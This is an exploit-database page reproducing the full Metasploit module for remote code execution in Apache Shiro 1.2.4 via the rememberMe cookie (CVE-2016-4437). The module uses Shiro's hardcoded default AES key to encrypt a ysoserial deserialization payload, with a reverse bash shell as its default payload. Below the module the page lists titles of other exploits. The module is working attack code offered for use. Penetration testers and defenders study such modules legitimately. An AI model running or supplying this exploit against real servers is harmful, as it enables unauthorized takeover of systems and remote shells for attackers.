Search for hundreds of thousands of exploits

"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-05-01

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Apache Shiro v1.2.4 Cookie RememberME Deserial RCE',
      'Description'    => %q{
        This vulnerability allows remote attackers to execute arbitrary code on vulnerable
        installations of Apache Shiro v1.2.4.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
            'L / l-codes[at]qq.com'  # Metasploit module
        ],
      'References'     =>
        [
            ['CVE', '2016-4437'],
            ['URL', 'https://github.com/Medicean/VulApps/tree/master/s/shiro/1']
        ],
      'Platform'       => %w{ win unix },
      'Arch'           => [ ARCH_CMD ],
      'Targets'        =>
        [
          [
            'Unix Command payload',
            'Arch' => ARCH_CMD,
            'Platform' => 'unix',
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
          ],
          [
            'Windows Command payload',
            'Arch' => ARCH_CMD,
            'Platform' => 'win'
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 7 2016',
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'WfsDelay'   => 5
        }
      )
    )
    register_options(
    [
      OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
    ])
  end

  def aes_encrypt(payload)
    aes = OpenSSL::Cipher.new('aes-128-cbc')
    aes.encrypt
    aes.key = Rex::Text.decode_base64('kPH+bIxk5D2deZiIxcaaaA==')
    aes.random_iv + aes.update(payload) + aes.final
  end

  def exploit
    cmd = payload.encoded
    vprint_status("Execute CMD: #{cmd}")
    type = ( target.name == 'Unix Command payload' ? 'bash' : 'cmd' )
    java_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload('CommonsCollections2', cmd, modified_type: type)
    ciphertext = aes_encrypt(java_payload)
    base64_ciphertext = Rex::Text.encode_base64(ciphertext)

    send_request_cgi({
      'uri'      => target_uri.path,
      'method'   => 'GET',
      'cookie'   => "rememberMe=#{base64_ciphertext}"
    })
  end

end
Release DateTitleTypePlatformAuthor
2020-07-26"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution"webappsmultiple"Patrick Hener"
2020-07-26"Socket.io-file 2.0.31 - Arbitrary File Upload"webappsmultipleCr0wTom
2020-07-26"Bludit 3.9.2 - Directory Traversal"webappsmultiple"James Green"
2020-07-26"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)"webappsmultiplebdrake
2020-07-26"Bio Star 2.8.2 - Local File Inclusion"webappsmultiple"SITE Team"
2020-07-22"Sophos VPN Web Panel 2020 - Denial of Service (Poc)"webappsmultiple"Berk KIRAS"
2020-07-22"Docsify.js 4.11.4 - Reflective Cross-Site Scripting"webappsmultiple"Amin Sharifi"
2020-07-14"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)"webappsmultiple"Mehmet Ince"
2020-07-14"BSA Radar 1.6.7234.24750 - Local File Inclusion"webappsmultiple"William Summerhill"
2020-07-07"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation"webappsmultiple"William Summerhill"
Release DateTitleTypePlatformAuthor
2020-05-25"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)"remotehardwareMetasploit
2020-05-25"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)"remotewindowsMetasploit
2020-05-22"WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)"remotemultipleMetasploit
2020-05-19"Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)"remotephpMetasploit
2020-05-01"Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)"remotemultipleMetasploit
2020-04-28"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)"localwindowsMetasploit
2020-04-20"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)"remotelinuxMetasploit
2020-04-17"Nexus Repository Manager - Java EL Injection RCE (Metasploit)"remotelinuxMetasploit
2020-04-16"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)"remotemultipleMetasploit
2020-04-16"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)"remotelinuxMetasploit
2020-04-16"Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)"remotejavaMetasploit
2020-04-16"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)"localmacosMetasploit
2020-04-16"TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)"remotelinux_mipsMetasploit
2020-04-16"Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-04-16"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)"remotewindowsMetasploit
2020-04-16"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)"remotephpMetasploit
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-10"Nagios XI - Authenticated Remote Command Execution (Metasploit)"remotelinuxMetasploit
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-09"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)"locallinuxMetasploit
2020-03-09"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)"remotewindowsMetasploit
2020-03-09"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)"remotemultipleMetasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48410/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.